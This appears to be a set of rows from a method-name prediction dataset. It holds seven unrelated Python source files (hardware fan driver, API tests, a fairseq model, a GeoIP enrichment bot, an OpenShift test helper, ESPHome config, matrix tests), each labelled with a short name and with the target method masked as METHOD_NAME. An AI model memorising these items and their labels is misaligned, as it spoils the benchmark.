self.max_speed_offset = PSU_FAN_MAX_SPEED_OFFSET
self.fan_direction_offset = PSU_FAN_DIRECTION_OFFSET
self.max_speed = 0
def get_name(self):
"""
Retrieves the name of the device
Returns:
String: The name of the device
"""
if self.is_psu_fan:
return "PSU{} Fan".format(self.fanindex)
else:
return "FanTray{}-Fan{}".format(self.fantrayindex, self.fanindex)
def get_model(self):
"""
Retrieves the part number of the FAN
Returns:
String: Part number of FAN
"""
if self.is_psu_fan:
return 'NA'
else:
return self.fru.get_board_part_number()
def get_serial(self):
"""
Retrieves the serial number of the FAN
Returns:
String: Serial number of FAN
"""
if self.is_psu_fan:
return 'NA'
else:
return self.fru.get_board_serial()
def METHOD_NAME(self):
"""
Retrieves the presence of the FAN
Returns:
bool: True if fan is present, False if not
"""
presence = False
if self.is_psu_fan:
return self.dependency.METHOD_NAME()
else:
is_valid, state = self.prsnt_sensor.get_reading()
if is_valid:
if (state & 0b1):
presence = True
return presence
def get_status(self):
"""
Retrieves the operational status of the FAN
Returns:
bool: True if FAN is operating properly, False if not
"""
status = False
is_valid, state = self.state_sensor.get_reading()
if is_valid:
if not state > 1:
status = True
return status
def get_direction(self):
"""
Retrieves the fan airfow direction
Returns:
A string, either FAN_DIRECTION_INTAKE or FAN_DIRECTION_EXHAUST
depending on fan direction
Notes:
In DellEMC platforms,
- Forward/Exhaust : Air flows from Port side to Fan side.
- Reverse/Intake : Air flows from Fan side to Port side.
"""
direction = [self.FAN_DIRECTION_EXHAUST, self.FAN_DIRECTION_INTAKE]
fan_status = self.METHOD_NAME()
if not fan_status:
return 'NA'
is_valid, fan_direction = self.fru.get_fru_data(self.fan_direction_offset)
if is_valid and fan_direction[0] < len(direction):
return direction[fan_direction[0]]
else:
return 'NA'
def get_speed(self):
"""
Retrieves the speed of the fan
Returns:
int: percentage of the max fan speed
"""
if self.max_speed == 0:
is_valid, max_speed = self.fru.get_fru_data(self.max_speed_offset,2)
if not is_valid:
return 0
self.max_speed = max_speed[1]
self.max_speed = max_speed[1] << 8 | max_speed[0]
is_valid, fan_speed = self.speed_sensor.get_reading()
if not is_valid or self.max_speed == 0:
speed = 0
else:
speed = (100 * fan_speed)//self.max_speed
return speed
def get_speed_rpm(self):
"""
Retrieves the speed of the fan
Returns:
int: percentage of the max fan speed
"""
fan_speed = 0
is_valid, fan_speed = self.speed_sensor.get_reading()
return fan_speed | null |
test views tasks api | """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import json
import pytest
from projects.models import Project
from ..utils import make_annotation, make_prediction, make_task, project_id # noqa
@pytest.mark.django_db
def METHOD_NAME(business_client, project_id):
# create
payload = dict(project=project_id, data={"test": 1})
response = business_client.post(
"/api/dm/views/",
data=json.dumps(payload),
content_type="application/json",
)
assert response.status_code == 201, response.content
view_id = response.json()["id"]
# no tasks
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
assert response.json()["total"] == 0
assert len(response.json()["tasks"]) == 0
project = Project.objects.get(pk=project_id)
task_data = {"text": "bbb"}
task_id = make_task({"data": task_data}, project).id
annotation_result = {"from_name": "my_class", "to_name": "text", "type": "choices", "value": {"choices": ["pos"]}}
make_annotation({"result": [annotation_result]}, task_id)
make_annotation(
{
"result": [annotation_result],
"was_cancelled": True,
},
task_id,
)
prediction_result = {"from_name": "my_class", "to_name": "text", "type": "choices", "value": {"choices": ["pos"]}}
make_prediction(
{
"result": [prediction_result],
},
task_id,
)
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
response_data = response.json()
assert response_data["total"] == 1
assert len(response_data["tasks"]) == 1
assert response_data["tasks"][0]["id"] == task_id
assert response_data["tasks"][0]["data"] == task_data
assert response_data["tasks"][0]["total_annotations"] == 1
assert "annotations_results" in response_data["tasks"][0]
assert response_data["tasks"][0]["cancelled_annotations"] == 1
assert response_data["tasks"][0]["total_predictions"] == 1
assert "predictions_results" in response_data["tasks"][0]
num_anno1 = response_data["tasks"][0]['annotations'][0]['id']
num_anno2 = response_data["tasks"][0]['annotations'][1]['id']
num_pred = response_data["tasks"][0]['predictions'][0]['id']
# delete annotations and check counters
business_client.delete(f"/api/annotations/{num_anno1}")
business_client.delete(f"/api/annotations/{num_anno2}")
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
response_data = response.json()
assert response_data["tasks"][0]["cancelled_annotations"] == 0
assert response_data["tasks"][0]["total_annotations"] == 0
# delete prediction and check counters
business_client.delete(f"/api/predictions/{num_pred}")
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
response_data = response.json()
assert response_data["tasks"][0]["cancelled_annotations"] == 0
assert response_data["tasks"][0]["total_annotations"] == 0
assert response_data["tasks"][0]["total_predictions"] == 0
@pytest.mark.parametrize(
"tasks_count, annotations_count, predictions_count",
[
[0, 0, 0],
[1, 0, 0],
[1, 1, 1],
[2, 2, 2],
],
)
@pytest.mark.django_db
def test_views_total_counters(tasks_count, annotations_count, predictions_count, business_client, project_id):
# create
payload = dict(project=project_id, data={"test": 1})
response = business_client.post(
"/api/dm/views/",
data=json.dumps(payload),
content_type="application/json",
)
assert response.status_code == 201, response.content
view_id = response.json()["id"]
project = Project.objects.get(pk=project_id)
for _ in range(0, tasks_count):
task_id = make_task({"data": {}}, project).id
print('TASK_ID: %s' % task_id)
for _ in range(0, annotations_count):
make_annotation({"result": []}, task_id)
for _ in range(0, predictions_count):
make_prediction({"result": []}, task_id)
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
response_data = response.json()
assert response_data["total"] == tasks_count, response_data
assert response_data["total_annotations"] == tasks_count * annotations_count, response_data
assert response_data["total_predictions"] == tasks_count * predictions_count, response_data | null |
set task ids | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
from typing import Dict, List, Optional
from pathlib import Path
import torch.nn as nn
from torch import Tensor
from fairseq import checkpoint_utils
from fairseq.models import register_model, register_model_architecture
from fairseq.utils import safe_hasattr
from fairseq.models.speech_to_text.s2t_transformer import (
S2TTransformerModel,
S2TTransformerEncoder,
TransformerDecoderScriptable
)
from fairseq.models.speech_to_text.s2t_transformer import base_architecture as s2t_base_architecture
from ..modules.attn_head_selector import AttnHeadSelector
from ..modules.head_selection_transformer_layer import HeadSelectionTransformerEncoderLayer
from .head_selection_transformer import HeadSelectionTransformerDecoder
logger = logging.getLogger(__name__)
@register_model("head_selection_s2t_transformer")
class HeadSelectionS2TTransformerModel(S2TTransformerModel):
"""
Head selection implemented in S2TTransformer
"""
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
@staticmethod
def add_args(parser):
S2TTransformerModel.add_args(parser)
# encoder head selection
parser.add_argument(
"--encoder-attn-head-select",
action="store_true",
default=False,
help="encoder head selection"
)
parser.add_argument(
"--total-encoder-attention-heads",
type=int,
help="total number of encoder attention heads"
)
# decoder self attention selection
parser.add_argument(
"--decoder-self-attn-head-select",
action="store_true",
default=False,
help="decoder self-attention head selection"
)
# decoder-encoder attention selection
parser.add_argument(
"--dec-enc-attn-head-select",
action="store_true",
default=False,
help="decoder-encoder attention head selection"
)
parser.add_argument(
"--total-decoder-attention-heads",
type=int,
help="total number of decoder attention heads"
)
# selection strategy
parser.add_argument(
"--attn-head-select-strategy",
type=str,
help="attention head selection strategy, subset or group"
)
@classmethod
def build_encoder(cls, args):
if safe_hasattr(args, "encoder_attn_head_select") and args.encoder_attn_head_select:
encoder = HeadSelectionS2TTransformerEncoder(args)
else:
encoder = S2TTransformerEncoder(args)
pretraining_path = getattr(args, "load_pretrained_encoder_from", None)
if pretraining_path is not None:
if not Path(pretraining_path).exists():
logger.warning(
f"skipped pretraining because {pretraining_path} does not exist"
)
else:
encoder = checkpoint_utils.load_pretrained_component_from_model(
component=encoder, checkpoint=pretraining_path
)
logger.info(f"loaded pretrained encoder from: {pretraining_path}")
return encoder
@classmethod
def build_decoder(cls, args, task, embed_tokens):
if (safe_hasattr(args, "decoder_self_attn_head_select") and args.decoder_self_attn_head_select) or (safe_hasattr(args, "dec_enc_attn_head_select") and args.dec_enc_attn_head_select):
return HeadSelectionTransformerDecoderScriptable(args, task.target_dictionary, embed_tokens)
else:
return TransformerDecoderScriptable(args, task.target_dictionary, embed_tokens)
class HeadSelectionS2TTransformerEncoder(S2TTransformerEncoder):
def __init__(self, args):
super().__init__(args)
self.attn_head_selector = AttnHeadSelector(
args.encoder_tasks,
args.encoder_layers,
args.total_encoder_attention_heads,
args.encoder_attention_heads,
args.attn_head_select_strategy,
)
self.task_ids = None
self.transformer_layers = nn.ModuleList([
HeadSelectionTransformerEncoderLayer(args, layer_idx, attn_head_selector=self.attn_head_selector) for layer_idx in range(args.encoder_layers)
])
def METHOD_NAME(self, task_ids):
self.task_ids = task_ids
def _forward(self, src_tokens, src_lengths, return_all_hiddens=False):
self.attn_head_selector.head_select(self.task_ids)
return super()._forward(src_tokens, src_lengths, return_all_hiddens)
class HeadSelectionTransformerDecoderScriptable(HeadSelectionTransformerDecoder):
def extract_features(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
):
# call scriptable method from parent class
x, _ = self.extract_features_scriptable(
prev_output_tokens,
encoder_out,
incremental_state,
full_context_alignment,
alignment_layer,
alignment_heads,
)
return x, None
@register_model_architecture(model_name="head_selection_s2t_transformer", arch_name="head_selection_s2t_transformer")
def base_architecture(args):
s2t_base_architecture(args)
args.encoder_attn_head_select = getattr(args, "encoder_attn_head_select", False)
args.decoder_self_attn_head_select = getattr(args, "decoder_self_attn_head_select", False)
args.dec_enc_attn_head_select = getattr(args, "dec_enc_attn_head_select", False)
args.total_encoder_attention_heads = getattr(args, "total_encoder_attention_heads", 8)
args.total_decoder_attention_heads = getattr(args, "total_decoder_attention_heads", 8)
args.attn_head_select_strategy = getattr(args, "attn_head_select_strategy", "group")
@register_model_architecture("head_selection_s2t_transformer", "head_selection_s2t_transformer_s")
def head_selection_s2t_transformer_s(args):
args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 256)
args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 256 * 8)
args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 4)
args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 4)
args.dropout = getattr(args, "dropout", 0.1)
base_architecture(args) | null |
update database | # SPDX-FileCopyrightText: 2015 National CyberSecurity Center
#
# SPDX-License-Identifier: AGPL-3.0-or-later
# -*- coding: utf-8 -*-
"""
This product includes GeoLite2 data created by MaxMind, available from
<a href="http://www.maxmind.com">http://www.maxmind.com</a>.
"""
import io
import sys
import pathlib
import requests
import tarfile
from intelmq.lib.bot import ExpertBot
from intelmq.lib.exceptions import MissingDependencyError
from intelmq.lib.utils import get_bots_settings, create_request_session
from intelmq.bin.intelmqctl import IntelMQController
try:
import geoip2.database
except ImportError:
geoip2 = None
class GeoIPExpertBot(ExpertBot):
"""Add geolocation information from a local MaxMind database to events (country, city, longitude, latitude)"""
database: str = "/opt/intelmq/var/lib/bots/maxmind_geoip/GeoLite2-City.mmdb" # TODO: should be pathlib.Path
license_key: str = "<insert Maxmind license key>"
overwrite: bool = False
use_registered: bool = False
autoupdate_cached_database: bool = True # Activate/deactivate update-database functionality
def init(self):
if geoip2 is None:
raise MissingDependencyError("geoip2")
try:
self.database = geoip2.database.Reader(self.database)
except OSError:
self.logger.exception("GeoIP Database does not exist or could not "
"be accessed in %r.",
self.database)
self.logger.error("Read 'bots/experts/geoip/README' and follow the"
" procedure.")
self.stop()
self.registered = self.use_registered
def process(self):
event = self.receive_message()
for key in ["source.%s", "destination.%s"]:
geo_key = key % "geolocation.%s"
if key % "ip" not in event:
continue
ip = event.get(key % "ip")
try:
info = self.database.city(ip)
if self.registered:
if info.registered_country.iso_code:
event.add(geo_key % "cc", info.registered_country.iso_code,
overwrite=self.overwrite)
else:
if info.country.iso_code:
event.add(geo_key % "cc", info.country.iso_code,
overwrite=self.overwrite)
if info.location.latitude:
event.add(geo_key % "latitude", info.location.latitude,
overwrite=self.overwrite)
if info.location.longitude:
event.add(geo_key % "longitude", info.location.longitude,
overwrite=self.overwrite)
if info.city.name:
event.add(geo_key % "city", info.city.name,
overwrite=self.overwrite)
except geoip2.errors.AddressNotFoundError:
pass
self.send_message(event)
self.acknowledge_message()
@classmethod
def run(cls, parsed_args=None):
if not parsed_args:
parsed_args = cls._create_argparser().parse_args()
if parsed_args.METHOD_NAME:
cls.METHOD_NAME(verbose=parsed_args.verbose)
else:
super().run(parsed_args=parsed_args)
@classmethod
def _create_argparser(cls):
argparser = super()._create_argparser()
argparser.add_argument("--update-database", action='store_true', help='downloads latest database data')
argparser.add_argument("--verbose", action='store_true', help='be verbose')
return argparser
@classmethod
def METHOD_NAME(cls, verbose=False):
bots = {}
license_key = None
runtime_conf = get_bots_settings()
try:
for bot in runtime_conf:
if runtime_conf[bot]["module"] == __name__ and runtime_conf[bot]['parameters'].get('autoupdate_cached_database', True):
license_key = runtime_conf[bot]["parameters"]["license_key"]
bots[bot] = runtime_conf[bot]["parameters"]["database"]
except KeyError as e:
error = f"Database update failed. Your configuration of {bot} is missing key {e}."
if str(e) == "'license_key'":
error += "\n"
error += "Since December 30, 2019 you need to register for a free license key to access GeoLite2 database.\n"
error += "https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases/"
sys.exit(error)
else:
sys.exit(error)
if not bots:
if verbose:
print(f"Database update skipped. No bots of type {__name__} present in runtime configuration or database update disabled with parameter 'autoupdate_cached_database'.")
sys.exit(0)
# we only need to import now, if there are no maxmind_geoip bots, this dependency does not need to be installed
try:
import maxminddb
except ImportError:
raise MissingDependencyError('maxminddb',
additional_text="Package maxminddb should be present because it "
"is a dependency for the required geoip2 package.")
try:
if verbose:
print("Downloading the latest database update...")
session = create_request_session()
response = session.get("https://download.maxmind.com/app/geoip_download",
params={
"license_key": license_key,
"edition_id": "GeoLite2-City",
"suffix": "tar.gz"
})
except requests.exceptions.RequestException as e:
sys.exit(f"Database update failed. Connection Error: {e}")
if response.status_code == 401:
sys.exit("Database update failed. Your license key is invalid.")
if response.status_code != 200:
sys.exit("Database update failed. Server responded: {}.\n"
"URL: {}".format(response.status_code, response.url))
database_data = None
try:
with tarfile.open(fileobj=io.BytesIO(response.content), mode='r:gz') as archive:
for member in archive.getmembers():
if "GeoLite2-City.mmdb" in member.name:
database_data = maxminddb.open_database(database=archive.extractfile(member),
mode=maxminddb.MODE_FD)
break
except maxminddb.InvalidDatabaseError:
sys.exit("Database update failed. Database file invalid.")
if not database_data:
sys.exit("Database update failed. Could not locate file 'GeoLite2-City.mmbd' in the downloaded archive.")
for database_path in set(bots.values()):
database_dir = pathlib.Path(database_path).parent
database_dir.mkdir(parents=True, exist_ok=True)
with open(database_path, "wb") as database:
database.write(database_data._buffer)
if verbose:
print("Database updated. Reloading affected bots.")
ctl = IntelMQController()
for bot in bots.keys():
ctl.bot_reload(bot)
BOT = GeoIPExpertBot | null |
update existing | import json
import subprocess
import uuid
from typing import Any
import waiting
from junit_report import JunitTestCase
import consts
from assisted_test_infra.test_infra import BaseInfraEnvConfig, utils
from assisted_test_infra.test_infra.helper_classes.base_cluster import BaseCluster
from assisted_test_infra.test_infra.helper_classes.config.base_day2_cluster_config import BaseDay2ClusterConfig
from assisted_test_infra.test_infra.helper_classes.nodes import Nodes
from assisted_test_infra.test_infra.utils.waiting import wait_till_all_hosts_are_in_status
from service_client import log
from service_client.assisted_service_api import InventoryClient
class Day2Cluster(BaseCluster):
_config: BaseDay2ClusterConfig
def __init__(
self,
api_client: InventoryClient,
config: BaseDay2ClusterConfig,
infra_env_config: BaseInfraEnvConfig,
day2_nodes: Nodes,
):
self._kubeconfig_path = utils.get_kubeconfig_path(config.day1_cluster.name)
self.name = config.cluster_name.get()
super().__init__(api_client, config, infra_env_config, day2_nodes)
def _create(self) -> str:
openshift_cluster_id = str(uuid.uuid4())
params = {
"openshift_version": self._config.openshift_version,
"api_vip_dnsname": self._config.day1_api_vip_dnsname,
}
cluster = self.api_client.create_day2_cluster(self.name, openshift_cluster_id, **params)
self._config.cluster_id = cluster.id
return cluster.id
def METHOD_NAME(self) -> str:
raise NotImplementedError("Creating Day2Cluster object from an existing cluster is not implemented.")
def prepare_nodes(self, is_static_ip: bool = False, **kwargs):
"""Prepare the day2 worker nodes. When this method finishes, the hosts are in 'known' status."""
self.set_pull_secret(self._config.pull_secret)
self.set_cluster_proxy()
self.config_etc_hosts(self._config.day1_cluster_details.api_vip, self._config.day1_api_vip_dnsname)
# create the infraenv with specified day2 CPU architecture
self.generate_and_download_infra_env(
iso_download_path=self._config.iso_download_path,
iso_image_type=self._config.iso_image_type,
cpu_architecture=self._config.day2_cpu_architecture,
)
# spawn VMs
super(Day2Cluster, self).prepare_nodes(is_static_ip=self._config.day1_cluster._infra_env_config.is_static_ip)
self.nodes.wait_for_networking()
self.set_hostnames_and_roles()
# wait for host to be known
wait_till_all_hosts_are_in_status(
client=self.api_client,
cluster_id=self._config.cluster_id,
nodes_count=self._config.day2_workers_count + self._config.day2_masters_count,
statuses=[consts.NodesStatus.KNOWN],
interval=30,
)
def set_cluster_proxy(self):
"""
Set cluster proxy - copy proxy configuration from another (e.g. day 1) cluster,
or allow setting/overriding it via command arguments
"""
if self._config.proxy:
http_proxy = self._config.proxy.http_proxy
https_proxy = self._config.proxy.https_proxy
no_proxy = self._config.proxy.no_proxy
self.api_client.set_cluster_proxy(self.id, http_proxy, https_proxy, no_proxy)
@staticmethod
def config_etc_hosts(api_vip: str, api_vip_dnsname: str):
with open("/etc/hosts", "r") as f:
hosts_lines = f.readlines()
for i, line in enumerate(hosts_lines):
if api_vip_dnsname in line:
hosts_lines[i] = api_vip + " " + api_vip_dnsname + "\n"
break
else:
hosts_lines.append(api_vip + " " + api_vip_dnsname + "\n")
with open("/etc/hosts", "w") as f:
f.writelines(hosts_lines)
@JunitTestCase()
def start_install_and_wait_for_installed(self):
ocp_ready_nodes = self.get_ocp_cluster_ready_nodes_num()
self._install_day2_cluster()
# post installation nodes day2 nodes rebooted
self.nodes.wait_till_nodes_are_ssh_ready()
self.wait_nodes_to_be_in_ocp(ocp_ready_nodes)
def wait_nodes_to_be_in_ocp(self, ocp_ready_nodes):
def wait_nodes_join_ocp_cluster(num_orig_nodes: int, num_new_nodes: int) -> bool:
self.approve_nodes_on_ocp_cluster()
return self.get_ocp_cluster_ready_nodes_num() == num_orig_nodes + num_new_nodes
log.info("Waiting until installed nodes has actually been added to the OCP cluster")
waiting.wait(
lambda: wait_nodes_join_ocp_cluster(
ocp_ready_nodes, self._config.day2_workers_count + self._config.day2_masters_count
),
timeout_seconds=consts.NODES_REGISTERED_TIMEOUT,
sleep_seconds=30,
waiting_for="Day2 nodes to be added to OCP cluster",
expected_exceptions=Exception,
)
log.info(
f"{self._config.day2_workers_count} worker and"
f" {self._config.day2_masters_count} master nodes were successfully added to OCP cluster"
)
def approve_nodes_on_ocp_cluster(self):
csrs = self.get_ocp_cluster_csrs(self._kubeconfig_path)
for csr in csrs:
if not csr["status"]:
csr_name = csr["metadata"]["name"]
subprocess.check_output(
f"oc --kubeconfig={self._kubeconfig_path} adm certificate approve {csr_name}",
shell=True,
)
log.info("CSR %s for node %s has been approved", csr_name, csr["spec"]["username"])
@staticmethod
def get_ocp_cluster_csrs(kubeconfig: Any) -> Any:
res = subprocess.check_output(f"oc --kubeconfig={kubeconfig} get csr --output=json", shell=True)
return json.loads(res)["items"]
def _install_day2_cluster(self):
# Start day2 nodes installation
log.info(f"Start installing all known nodes in the cluster {self.id}")
hosts = self.api_client.get_cluster_hosts(self.id)
for host in hosts:
if host["status"] == "known":
self.api_client.install_day2_host(self._infra_env_config.infra_env_id, host["id"])
log.info(
f"Waiting until all nodes of cluster {self.id} have been installed (reached " "added-to-existing-cluster)",
)
wait_till_all_hosts_are_in_status(
client=self.api_client,
cluster_id=self.id,
nodes_count=self._config.day2_workers_count + self._config.day2_masters_count,
statuses=[consts.NodesStatus.DAY2_INSTALLED],
interval=30,
)
def get_ocp_cluster_ready_nodes_num(self) -> int:
nodes = self.get_ocp_cluster_nodes(self._kubeconfig_path)
return len([node for node in nodes if self.is_ocp_node_ready(node["status"])])
@staticmethod
def get_ocp_cluster_nodes(kubeconfig: str):
res = subprocess.check_output(f"oc --kubeconfig={kubeconfig} get nodes --output=json", shell=True)
return json.loads(res)["items"]
@staticmethod
def is_ocp_node_ready(node_status: any) -> bool:
if not node_status:
return False
for condition in node_status["conditions"]:
if condition["status"] == "True" and condition["type"] == "Ready":
return True
return False | null |
validate | from esphome import pins
import esphome.config_validation as cv
import esphome.codegen as cg
from esphome.const import (
CONF_DOMAIN,
CONF_ID,
CONF_MANUAL_IP,
CONF_STATIC_IP,
CONF_TYPE,
CONF_USE_ADDRESS,
CONF_GATEWAY,
CONF_SUBNET,
CONF_DNS1,
CONF_DNS2,
)
from esphome.core import CORE, coroutine_with_priority
from esphome.components.network import IPAddress
CONFLICTS_WITH = ["wifi"]
DEPENDENCIES = ["esp32"]
AUTO_LOAD = ["network"]
ethernet_ns = cg.esphome_ns.namespace("ethernet")
CONF_PHY_ADDR = "phy_addr"
CONF_MDC_PIN = "mdc_pin"
CONF_MDIO_PIN = "mdio_pin"
CONF_CLK_MODE = "clk_mode"
CONF_POWER_PIN = "power_pin"
EthernetType = ethernet_ns.enum("EthernetType")
ETHERNET_TYPES = {
"LAN8720": EthernetType.ETHERNET_TYPE_LAN8720,
"RTL8201": EthernetType.ETHERNET_TYPE_RTL8201,
"DP83848": EthernetType.ETHERNET_TYPE_DP83848,
"IP101": EthernetType.ETHERNET_TYPE_IP101,
"JL1101": EthernetType.ETHERNET_TYPE_JL1101,
"KSZ8081": EthernetType.ETHERNET_TYPE_KSZ8081,
"KSZ8081RNA": EthernetType.ETHERNET_TYPE_KSZ8081RNA,
}
emac_rmii_clock_mode_t = cg.global_ns.enum("emac_rmii_clock_mode_t")
emac_rmii_clock_gpio_t = cg.global_ns.enum("emac_rmii_clock_gpio_t")
CLK_MODES = {
"GPIO0_IN": (
emac_rmii_clock_mode_t.EMAC_CLK_EXT_IN,
emac_rmii_clock_gpio_t.EMAC_CLK_IN_GPIO,
),
"GPIO0_OUT": (
emac_rmii_clock_mode_t.EMAC_CLK_OUT,
emac_rmii_clock_gpio_t.EMAC_APPL_CLK_OUT_GPIO,
),
"GPIO16_OUT": (
emac_rmii_clock_mode_t.EMAC_CLK_OUT,
emac_rmii_clock_gpio_t.EMAC_CLK_OUT_GPIO,
),
"GPIO17_OUT": (
emac_rmii_clock_mode_t.EMAC_CLK_OUT,
emac_rmii_clock_gpio_t.EMAC_CLK_OUT_180_GPIO,
),
}
MANUAL_IP_SCHEMA = cv.Schema(
{
cv.Required(CONF_STATIC_IP): cv.ipv4,
cv.Required(CONF_GATEWAY): cv.ipv4,
cv.Required(CONF_SUBNET): cv.ipv4,
cv.Optional(CONF_DNS1, default="0.0.0.0"): cv.ipv4,
cv.Optional(CONF_DNS2, default="0.0.0.0"): cv.ipv4,
}
)
EthernetComponent = ethernet_ns.class_("EthernetComponent", cg.Component)
ManualIP = ethernet_ns.struct("ManualIP")
def METHOD_NAME(config):
if CONF_USE_ADDRESS not in config:
if CONF_MANUAL_IP in config:
use_address = str(config[CONF_MANUAL_IP][CONF_STATIC_IP])
else:
use_address = CORE.name + config[CONF_DOMAIN]
config[CONF_USE_ADDRESS] = use_address
return config
CONFIG_SCHEMA = cv.All(
cv.Schema(
{
cv.GenerateID(): cv.declare_id(EthernetComponent),
cv.Required(CONF_TYPE): cv.enum(ETHERNET_TYPES, upper=True),
cv.Required(CONF_MDC_PIN): pins.internal_gpio_output_pin_number,
cv.Required(CONF_MDIO_PIN): pins.internal_gpio_output_pin_number,
cv.Optional(CONF_CLK_MODE, default="GPIO0_IN"): cv.enum(
CLK_MODES, upper=True, space="_"
),
cv.Optional(CONF_PHY_ADDR, default=0): cv.int_range(min=0, max=31),
cv.Optional(CONF_POWER_PIN): pins.internal_gpio_output_pin_number,
cv.Optional(CONF_MANUAL_IP): MANUAL_IP_SCHEMA,
cv.Optional(CONF_DOMAIN, default=".local"): cv.domain_name,
cv.Optional(CONF_USE_ADDRESS): cv.string_strict,
cv.Optional("enable_mdns"): cv.invalid(
"This option has been removed. Please use the [disabled] option under the "
"new mdns component instead."
),
}
).extend(cv.COMPONENT_SCHEMA),
METHOD_NAME,
)
def manual_ip(config):
return cg.StructInitializer(
ManualIP,
("static_ip", IPAddress(*config[CONF_STATIC_IP].args)),
("gateway", IPAddress(*config[CONF_GATEWAY].args)),
("subnet", IPAddress(*config[CONF_SUBNET].args)),
("dns1", IPAddress(*config[CONF_DNS1].args)),
("dns2", IPAddress(*config[CONF_DNS2].args)),
)
@coroutine_with_priority(60.0)
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
cg.add(var.set_phy_addr(config[CONF_PHY_ADDR]))
cg.add(var.set_mdc_pin(config[CONF_MDC_PIN]))
cg.add(var.set_mdio_pin(config[CONF_MDIO_PIN]))
cg.add(var.set_type(config[CONF_TYPE]))
cg.add(var.set_clk_mode(*CLK_MODES[config[CONF_CLK_MODE]]))
cg.add(var.set_use_address(config[CONF_USE_ADDRESS]))
if CONF_POWER_PIN in config:
cg.add(var.set_power_pin(config[CONF_POWER_PIN]))
if CONF_MANUAL_IP in config:
cg.add(var.set_manual_ip(manual_ip(config[CONF_MANUAL_IP])))
cg.add_define("USE_ETHERNET")
if CORE.using_arduino:
cg.add_library("WiFi", None) | null |
test immutable creation | import pytest
from diofant import (Equality, ImmutableMatrix, ImmutableSparseMatrix, Matrix,
SparseMatrix, Unequality, eye, false, sympify, true,
zeros)
from diofant.abc import x, y
__all__ = ()
IM = ImmutableMatrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
ieye = ImmutableMatrix(eye(3))
def METHOD_NAME():
assert IM.shape == (3, 3)
assert IM[1, 2] == 6
assert IM[2, 2] == 9
def test_immutability():
with pytest.raises(TypeError):
IM[2, 2] = 5
ISM = SparseMatrix(IM).as_immutable()
with pytest.raises(TypeError):
ISM[2, 2] = 5
def test_slicing():
assert IM[1, :] == ImmutableMatrix([[4, 5, 6]])
assert IM[:2, :2] == ImmutableMatrix([[1, 2], [4, 5]])
def test_subs():
A = ImmutableMatrix([[1, 2], [3, 4]])
B = ImmutableMatrix([[1, 2], [x, 4]])
C = ImmutableMatrix([[-x, x*y], [-(x + y), y**2]])
assert B.subs({x: 3}) == A
assert (x*B).subs({x: 3}) == 3*A
assert (x*eye(2) + B).subs({x: 3}) == 3*eye(2) + A
assert C.subs({x: -1, y: -2}) == A
assert C.subs({x: y - 1, y: x - 1}, simultaneous=True) == \
ImmutableMatrix([[1 - y, (x - 1)*(y - 1)], [2 - x - y, (x - 1)**2]])
def test_as_immutable():
X = Matrix([[1, 2], [3, 4]])
assert sympify(X) == X.as_immutable() == ImmutableMatrix([[1, 2], [3, 4]])
X = SparseMatrix(5, 5, {})
assert sympify(X) == X.as_immutable() == ImmutableSparseMatrix(
[[0 for i in range(5)] for i in range(5)])
def test_function_return_types():
# Lets ensure that decompositions of immutable matrices remain immutable
# I.e. do MatrixBase methods return the correct class?
X = ImmutableMatrix([[1, 2], [3, 4]])
Y = ImmutableMatrix([[1], [0]])
q, r = X.QRdecomposition()
assert (type(q), type(r)) == (ImmutableMatrix, ImmutableMatrix)
assert type(X.LUsolve(Y)) == ImmutableMatrix
assert type(X.QRsolve(Y)) == ImmutableMatrix
X = ImmutableMatrix([[1, 2], [2, 1]])
assert X.T == X
assert X.is_symmetric
assert type(X.cholesky()) == ImmutableMatrix
L, D = X.LDLdecomposition()
assert (type(L), type(D)) == (ImmutableMatrix, ImmutableMatrix)
assert X.is_diagonalizable()
assert X.berkowitz_det() == -3
assert X.norm(2) == 3
assert type(X.eigenvects()[0][2][0]) == ImmutableMatrix
assert type(zeros(3, 3).as_immutable().nullspace()[0]) == ImmutableMatrix
X = ImmutableMatrix([[1, 0], [2, 1]])
assert type(X.lower_triangular_solve(Y)) == ImmutableMatrix
assert type(X.T.upper_triangular_solve(Y)) == ImmutableMatrix
assert type(X.minorMatrix(0, 0)) == ImmutableMatrix
# issue sympy/sympy#6279
# https://github.com/sympy/sympy/issues/6279
# Test that Immutable _op_ Immutable => Immutable and not MatExpr
def test_immutable_evaluation():
X = ImmutableMatrix(eye(3))
A = ImmutableMatrix(3, 3, range(9))
assert isinstance(X + A, ImmutableMatrix)
assert isinstance(X * A, ImmutableMatrix)
assert isinstance(X * 2, ImmutableMatrix)
assert isinstance(2 * X, ImmutableMatrix)
assert isinstance(A**2, ImmutableMatrix)
def test_deterimant():
assert ImmutableMatrix(4, 4, lambda i, j: i + j).det() == 0
def test_Equality():
assert Equality(IM, IM) is true
assert Unequality(IM, IM) is false
assert Equality(IM, IM.subs({1: 2})) is false
assert Unequality(IM, IM.subs({1: 2})) is true
assert Equality(IM, 2) is false
assert Unequality(IM, 2) is true
M = ImmutableMatrix([x, y])
assert Equality(M, IM) is false
assert Unequality(M, IM) is true
assert Equality(M, M.subs({x: 2})).subs({x: 2}) is true
assert Unequality(M, M.subs({x: 2})).subs({x: 2}) is false
assert Equality(M, M.subs({x: 2})).subs({x: 3}) is false
assert Unequality(M, M.subs({x: 2})).subs({x: 3}) is true
def test_diff_integrate():
M = Matrix([x, 1]).as_immutable()
